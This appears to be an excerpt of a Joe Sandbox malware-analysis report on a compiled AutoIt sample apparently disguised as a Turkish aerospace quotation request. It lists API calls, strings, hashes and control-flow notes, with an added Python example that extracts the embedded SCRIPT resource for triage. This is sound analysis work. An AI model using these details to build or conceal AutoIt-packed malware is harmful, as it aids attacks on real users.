  • Part of subcall function 00FA3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00FA3A5F
  • Part of subcall function 00FA3A46: LoadIconW.USER32(00000063), ref: 00FA3A76
  • Part of subcall function 00FA3A46: LoadIconW.USER32(000000A4), ref: 00FA3A88
  • Part of subcall function 00FA3A46: LoadIconW.USER32(000000A2), ref: 00FA3A9A
  • Part of subcall function 00FA3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FA3AC0
  • Part of subcall function 00FA3A46: RegisterClassExW.USER32(?), ref: 00FA3B16
  • Part of subcall function 00FA39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FA3A03
  • Part of subcall function 00FA39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FA3A24
  • Part of subcall function 00FA39D5: ShowWindow.USER32(00000000,?,?), ref: 00FA3A38
  • Part of subcall function 00FA39D5: ShowWindow.USER32(00000000,?,?), ref: 00FA3A41
  • Part of subcall function 00FA434A: _memset.LIBCMT ref: 00FA4370
  • Part of subcall function 00FA434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FA4415
Strings
• runas, xrefs: 00FDD33A
• This is a third-party compiled AutoIt script., xrefs: 00FDD279
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
• String ID: This is a third-party compiled AutoIt script.$runas
• API String ID: 529118366-3287110873
• Opcode ID: 8a4346c65a115b3b2eb4c2b9589a029b5505d8888d210271a4f56192ba0bcaf3
• Instruction ID: 4d5e202afb158beb9fd10a048aab9bbd6c6617ce790dcd9f1a8e34c8b23896c0
• Opcode Fuzzy Hash: 8a4346c65a115b3b2eb4c2b9589a029b5505d8888d210271a4f56192ba0bcaf3
• Instruction Fuzzy Hash: 18514AB1D0420AAECF21EFB5DC06EFD7BB9AF477A0F004059F491A6152CA795605FB21

Control-flow Graph (rendered graph not preserved; legend: Executed / Not Executed; basic blocks summarized from the serialized edge list)
• fa49a0-fa4a00: GetVersionExW, then internal calls fa7667 and fa7bcc; fa4a15-fa4a4c calls fa7d2c and fa7726.
• fa4a93-fa4aaa: GetCurrentProcess, IsWow64Process.
• fa4ac2 and fa4ad4 each call fa4b37 in sequence; when both are followed, fa4ae3-fa4ae7 calls GetNativeSystemInfo. The alternative edge out of fa4ac2 leads to fa4b1f-fa4b29 (GetSystemInfo); the alternative edge out of fa4aaf-fa4ac0 leads to fa4b2b-fa4b35 (GetSystemInfo) and from there directly to fa4af8.
• fa4ae9-fa4aed is reached from both the GetNativeSystemInfo and the fa4b1f GetSystemInfo paths and either calls FreeLibrary (fa4aef-fa4af2) or continues straight to fa4af8-fa4b08.
• Blocks in the fdd767-fdd894 range are loop and error-handling paths with no API calls; all of them rejoin at fa4a93.
APIs
• GetVersionExW.KERNEL32(?), ref: 00FA49CD
  • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
• GetCurrentProcess.KERNEL32(?,0102FAEC,00000000,00000000,?), ref: 00FA4A9A
• IsWow64Process.KERNEL32(00000000), ref: 00FA4AA1
• GetNativeSystemInfo.KERNELBASE(00000000), ref: 00FA4AE7
• FreeLibrary.KERNEL32(00000000), ref: 00FA4AF2
• GetSystemInfo.KERNEL32(00000000), ref: 00FA4B23
• GetSystemInfo.KERNEL32(00000000), ref: 00FA4B2F
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
• String ID:
• API String ID: 1986165174-0
• Opcode ID: 19e72ae79c5c338e8a90857335d345af0cc5eccae33006e6f5206b99149d898c
• Instruction ID: 0f679460154b689cd85d7bd419e1839f2c75ea18e975ef6d3025b304bca3b106
• Opcode Fuzzy Hash: 19e72ae79c5c338e8a90857335d345af0cc5eccae33006e6f5206b99149d898c
• Instruction Fuzzy Hash: 919102719897C1DEC731DF6884502AABFF5AF6A310F58499ED0C683B02D264B908E769

Control-flow Graph (rendered graph not preserved; legend: Executed / Not Executed; basic blocks summarized from the serialized edge list)
• fa4e89-fa4ea1 CreateStreamOnHGlobal → fa4ea3-fa4eba FindResourceExW → fdd933-fdd942 LoadResource → fdd948-fdd956 SizeofResource → fdd95c-fdd967 LockResource → fdd96d-fdd98b. Every step's alternate edge goes to the common exit block fa4ec0, i.e. any failure in the chain abandons the resource load.
APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00FA4D8E,?,?,00000000,00000000), ref: 00FA4E99
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00FA4D8E,?,?,00000000,00000000), ref: 00FA4EB0
• LoadResource.KERNEL32(?,00000000,?,?,00FA4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00FA4E2F), ref: 00FDD937
• SizeofResource.KERNEL32(?,00000000,?,?,00FA4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00FA4E2F), ref: 00FDD94C
• LockResource.KERNEL32(00FA4D8E,?,?,00FA4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00FA4E2F,00000000), ref: 00FDD95F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Similarity
• API ID: Resource$CreateFindGlobalLoadLockSizeofStream
• String ID: SCRIPT
• API String ID: 3051347437-3967369404
• Opcode ID: b755e6f71e0aa34a98ad7dd6743a257e11be60ee15270158badac29da63e8a6f
• Instruction ID: 96881683f966eceb3b9d2da17f78c40e3c01ed8ddbf2a5ad7e2853a9bb19d048
• Opcode Fuzzy Hash: b755e6f71e0aa34a98ad7dd6743a257e11be60ee15270158badac29da63e8a6f
• Instruction Fuzzy Hash: CD114CB5640701ABD7318F65EC88F677BBAEBC6B51F204268F44596250DBA2E8049660
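The FindResourceExW(?, 0000000A, SCRIPT, 00000000) → LoadResource → SizeofResource → LockResource chain above is the stub locating its embedded script: resource type 0x0A is RT_RCDATA and the resource name is SCRIPT. Together with the "This is a third-party compiled AutoIt script." string recorded in the first function's String ID, that resource is the static indicator an analyst checks for before reaching for a decompiler. The Python below is an added triage example and is not part of the Joe Sandbox report, of AutoIt, or of the sample: it performs the same type → name → language lookup over a raw PE resource directory and returns the SCRIPT blob that LockResource would hand back. The resource-section image, its RVA (0x3000) and the script payload are constructed inline for the test via the build_sample_rsrc helper, which is an assumption of this example; for a real on-disk PE the caller must first map the resource data directory to a file offset through the section table, which is deliberately left out here.

```python
import struct

RT_RCDATA = 10  # the 0000000A resource type passed to FindResourceExW in the report
AUTOIT_MARKER = b"This is a third-party compiled AutoIt script."  # string recorded in the stub


def _entries(res, dir_off):
    """Yield (key, offset, is_subdir) for each IMAGE_RESOURCE_DIRECTORY_ENTRY of the
    directory at dir_off. key is an int ID or a str name; names are length-prefixed
    UTF-16LE strings addressed relative to the start of the resource section."""
    n_named, n_id = struct.unpack_from("<HH", res, dir_off + 12)
    for i in range(n_named + n_id):
        name, off = struct.unpack_from("<II", res, dir_off + 16 + 8 * i)
        if name & 0x80000000:
            str_off = name & 0x7FFFFFFF
            length = struct.unpack_from("<H", res, str_off)[0]
            key = res[str_off + 2:str_off + 2 + 2 * length].decode("utf-16-le")
        else:
            key = name
        yield key, off & 0x7FFFFFFF, bool(off & 0x80000000)


def _match(key, wanted):
    # FindResource compares names case-insensitively; integer IDs compare as ints.
    if isinstance(key, str) and isinstance(wanted, str):
        return key.upper() == wanted.upper()
    return key == wanted


def find_resource(res, rtype, rname):
    """Static equivalent of FindResourceExW(hModule, rtype, rname, 0): walk the
    type -> name -> language levels and return (data_rva, size) of the first
    language entry, or None. The loader applies language fallback at the third
    level; this static walk simply takes the first entry it finds."""
    for key, off, is_dir in _entries(res, 0):
        if not is_dir or not _match(key, rtype):
            continue
        for key2, off2, is_dir2 in _entries(res, off):
            if not is_dir2 or not _match(key2, rname):
                continue
            for _lang, off3, is_dir3 in _entries(res, off2):
                if not is_dir3:
                    data_rva, size = struct.unpack_from("<II", res, off3)
                    return data_rva, size
    return None


def extract_script_resource(res, section_rva):
    """Return the bytes of the RT_RCDATA 'SCRIPT' resource (what LockResource would
    point at), or None when the section carries no such resource. section_rva is
    the RVA of the resource section, needed to map the data entry's RVA back."""
    hit = find_resource(res, RT_RCDATA, "SCRIPT")
    if hit is None:
        return None
    data_rva, size = hit
    start = data_rva - section_rva
    if start < 0 or start + size > len(res):
        return None  # data entry points outside the section: treat as absent
    return bytes(res[start:start + size])


def has_autoit_stub_string(image):
    """Second indicator from the report: the stub's own identification string."""
    return AUTOIT_MARKER in image


def build_sample_rsrc(section_rva, payload):
    """Constructed test input (an assumption of this example, not data from the
    sample): a minimal resource section with one RT_RCDATA resource named SCRIPT."""
    root, name_dir, lang_dir, data_entry, name_str, data = 0x00, 0x18, 0x30, 0x48, 0x58, 0x68

    def directory(entries):
        n_named = sum(1 for k, _ in entries if k & 0x80000000)
        hdr = struct.pack("<IIHHHH", 0, 0, 0, 0, n_named, len(entries) - n_named)
        return hdr + b"".join(struct.pack("<II", k, o) for k, o in entries)

    img = bytearray(data + len(payload))
    img[root:root + 24] = directory([(RT_RCDATA, 0x80000000 | name_dir)])
    img[name_dir:name_dir + 24] = directory([(0x80000000 | name_str, 0x80000000 | lang_dir)])
    img[lang_dir:lang_dir + 24] = directory([(0x0409, data_entry)])
    img[data_entry:data_entry + 16] = struct.pack("<IIII", section_rva + data, len(payload), 0, 0)
    encoded = "SCRIPT".encode("utf-16-le")
    img[name_str:name_str + 2 + len(encoded)] = struct.pack("<H", 6) + encoded
    img[data:] = payload
    return bytes(img)


if __name__ == "__main__":
    sample = build_sample_rsrc(0x3000, b"constructed script payload")
    print(find_resource(sample, RT_RCDATA, "SCRIPT"))
    print(extract_script_resource(sample, 0x3000))
```

The walker deliberately mirrors what the stub does at runtime, so a hit here means the sample would reach the LoadResource/LockResource path and hand the blob to CreateStreamOnHGlobal; a miss on a binary that still carries the stub string suggests the script was stored some other way, which is worth a second look rather than a clean verdict.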
APIs
• GetFileAttributesW.KERNELBASE(?,00FDE398), ref: 0100446A
• FindFirstFileW.KERNELBASE(?,?), ref: 0100447B
• FindClose.KERNEL32(00000000), ref: 0100448B
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
• Opcode ID: bf03e10ee1d07cb1372e3b7cde5c4a4fe745aa273c3e54a459dc6882f69640a3
• Instruction ID: 34c455d664bfa9a2c399a00f8cf1703d80cca51428215897ba6fd0db01e847da
• Opcode Fuzzy Hash: bf03e10ee1d07cb1372e3b7cde5c4a4fe745aa273c3e54a459dc6882f69640a3
• Instruction Fuzzy Hash: 17E0D8324105016752326E38EC0D4EE77AC9E06275F20474AF9B5C10C0EF7859048699
Strings
• Variable must be of type 'Object'., xrefs: 00FE3E62
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Similarity
• API ID:
• String ID: Variable must be of type 'Object'.
• API String ID: 0-109567571
• Opcode ID: da023db69b94cd8f8a817aff00be4d88328b1a6618ea4727a6a636092256e086
• Instruction ID: 6e729d9a8fd6327aaa937de596b08a7c1498d39dea93df2c32b92daf3320a977
• Opcode Fuzzy Hash: da023db69b94cd8f8a817aff00be4d88328b1a6618ea4727a6a636092256e086
• Instruction Fuzzy Hash: 49A28DB5E00206CFCB24CF58C484AAEB7B2FF5A324F248069D955AB351D735ED46EB90
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FB0A5B
• timeGetTime.WINMM ref: 00FB0D16
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FB0E53
• Sleep.KERNEL32(0000000A), ref: 00FB0E61
• LockWindowUpdate.USER32(00000000,?,?), ref: 00FB0EFA
• DestroyWindow.USER32 ref: 00FB0F06
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FB0F20
• Sleep.KERNEL32(0000000A,?,?), ref: 00FE4E83
• TranslateMessage.USER32(?), ref: 00FE5C60
• DispatchMessageW.USER32(?), ref: 00FE5C6E
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FE5C82
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
Similarity
• API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
• String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
• API String ID: 4212290369-3242690629
• Opcode ID: 8759f66dee00d5fdb359d65d5a0402c4c45989a98773a93918bee6aa927f59bf
• Instruction ID: 9ed69ea58b8d705ba5c6a7cd149d6e952d11f22bf692b2d2850dc176d45392d7
• Opcode Fuzzy Hash: 8759f66dee00d5fdb359d65d5a0402c4c45989a98773a93918bee6aa927f59bf
• Instruction Fuzzy Hash: DFB20270608782DFD734DF25C884BABB7E4BF85718F14491DE589872A1CB79E844EB82

Control-flow Graph

APIs
  • Part of subcall function 01008F5F: __time64.LIBCMT ref: 01008F69
  • Part of subcall function 00FA4EE5: _fseek.LIBCMT ref: 00FA4EFD
• __wsplitpath.LIBCMT ref: 01009234
  • Part of subcall function 00FC40FB: __wsplitpath_helper.LIBCMT ref: 00FC413B
• _wcscpy.LIBCMT ref: 01009247
• _wcscat.LIBCMT ref: 0100925A
• __wsplitpath.LIBCMT ref: 0100927F
• _wcscat.LIBCMT ref: 01009295
• _wcscat.LIBCMT ref: 010092A8
  • Part of subcall function 01008FA5: _memmove.LIBCMT ref: 01008FDE
  • Part of subcall function 01008FA5: _memmove.LIBCMT ref: 01008FED
• _wcscmp.LIBCMT ref: 010091EF
  • Part of subcall function 01009734: _wcscmp.LIBCMT ref: 01009824
  • Part of subcall function 01009734: _wcscmp.LIBCMT ref: 01009837
• DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 01009452
• _wcsncpy.LIBCMT ref: 010094C5
• DeleteFileW.KERNEL32(?,?), ref: 010094FB
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 01009511
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01009522
• DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01009534
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1500180987-0
                                                                                                                                    • Opcode ID: 22c26146bf17b54633d0e7c0aa79d78bca546bcbf126f9a7e96c54d69eb3d683
                                                                                                                                    • Instruction ID: d56839f5e9c8569490163cf2969622ac77bceab98d49c47ad5b2bf54d6d3b3eb
                                                                                                                                    • Opcode Fuzzy Hash: 22c26146bf17b54633d0e7c0aa79d78bca546bcbf126f9a7e96c54d69eb3d683
                                                                                                                                    • Instruction Fuzzy Hash: D0C15CB1D00219AEDF21DF95CC81EDEBBBDEF95304F0040AAE609E7181EB749A449F61

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00FA3074
                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00FA309E
                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FA30AF
                                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00FA30CC
                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FA30DC
                                                                                                                                    • LoadIconW.USER32(000000A9), ref: 00FA30F2
                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FA3101
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                                    • Opcode ID: 5af8f17c77ff1c91c8039bd23e31b6834991673c5eb742fc003e7f48ffceaab9
                                                                                                                                    • Instruction ID: b534c2f238e59b7e13bfa13bfdbc73700c3b9116f6ef83bab3c348fba4385b2b
                                                                                                                                    • Opcode Fuzzy Hash: 5af8f17c77ff1c91c8039bd23e31b6834991673c5eb742fc003e7f48ffceaab9
                                                                                                                                    • Instruction Fuzzy Hash: 7A3136B184534AAFDB60CFA4E889A8DBBF0FB09390F24455EE5C0E6294D3BA0585CF51

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00FA3074
                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00FA309E
                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FA30AF
                                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00FA30CC
                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FA30DC
                                                                                                                                    • LoadIconW.USER32(000000A9), ref: 00FA30F2
                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FA3101
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                                    • Opcode ID: 3660cc2c60e77d2fe5f307f97ad268229618e899c6660896037145c5ce06a63c
                                                                                                                                    • Instruction ID: 05663aeea9b0575f46bdb8a5f8ecb068aea0fb94b649693cc358fbd26a8b5c61
                                                                                                                                    • Opcode Fuzzy Hash: 3660cc2c60e77d2fe5f307f97ad268229618e899c6660896037145c5ce06a63c
                                                                                                                                    • Instruction Fuzzy Hash: 9421F4B1D00219AFDB20DFA4E888B9DBBF4FB08780F10411AF990E6294D7BA45448F91

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010652F8,?,00FA37AE,?), ref: 00FA4724
                                                                                                                                      • Part of subcall function 00FC050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00FA7165), ref: 00FC052D
                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00FA71A8
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FDE8C8
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FDE909
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00FDE947
                                                                                                                                    • _wcscat.LIBCMT ref: 00FDE9A0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                    • API String ID: 2673923337-2727554177
                                                                                                                                    • Opcode ID: bb682af2efcc1917c71d8074816300a0e020b2aeafcbe0c62f37c2b1f9306e3a
                                                                                                                                    • Instruction ID: 45df1a56da4f13fe1dc6e028d76086493f71c4967623c37c0f4fdfc1421b97f0
                                                                                                                                    • Opcode Fuzzy Hash: bb682af2efcc1917c71d8074816300a0e020b2aeafcbe0c62f37c2b1f9306e3a
                                                                                                                                    • Instruction Fuzzy Hash: 5A7180B15093029EC324EF65EC81D9BBBF8FF89350F40052EF48587264DB7A9949DB92

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00FA3A50
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00FA3A5F
                                                                                                                                    • LoadIconW.USER32(00000063), ref: 00FA3A76
                                                                                                                                    • LoadIconW.USER32(000000A4), ref: 00FA3A88
                                                                                                                                    • LoadIconW.USER32(000000A2), ref: 00FA3A9A
                                                                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FA3AC0
                                                                                                                                    • RegisterClassExW.USER32(?), ref: 00FA3B16
                                                                                                                                      • Part of subcall function 00FA3041: GetSysColorBrush.USER32(0000000F), ref: 00FA3074
                                                                                                                                      • Part of subcall function 00FA3041: RegisterClassExW.USER32(00000030), ref: 00FA309E
                                                                                                                                      • Part of subcall function 00FA3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FA30AF
                                                                                                                                      • Part of subcall function 00FA3041: InitCommonControlsEx.COMCTL32(?), ref: 00FA30CC
                                                                                                                                      • Part of subcall function 00FA3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FA30DC
                                                                                                                                      • Part of subcall function 00FA3041: LoadIconW.USER32(000000A9), ref: 00FA30F2
                                                                                                                                      • Part of subcall function 00FA3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FA3101
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                                                    • API String ID: 423443420-4155596026
                                                                                                                                    • Opcode ID: b8ea8496d5097ea203a8893023410a52cf5e3b9394f4ce6f1edb52a4974c331b
                                                                                                                                    • Instruction ID: b8c09096c28dac162b98c169cc3723757366c36f233ac24d838e4577b2799c0e
                                                                                                                                    • Opcode Fuzzy Hash: b8ea8496d5097ea203a8893023410a52cf5e3b9394f4ce6f1edb52a4974c331b
                                                                                                                                    • Instruction Fuzzy Hash: FC215AB1D0030AAFEB20DFA4EC09B9D7BB5FB09791F10011AF584A62A5D3BA5640DF94

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00FA36D2
                                                                                                                                    • KillTimer.USER32(?,00000001), ref: 00FA36FC
                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FA371F
                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FA372A
                                                                                                                                    • CreatePopupMenu.USER32 ref: 00FA373E
                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00FA374D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
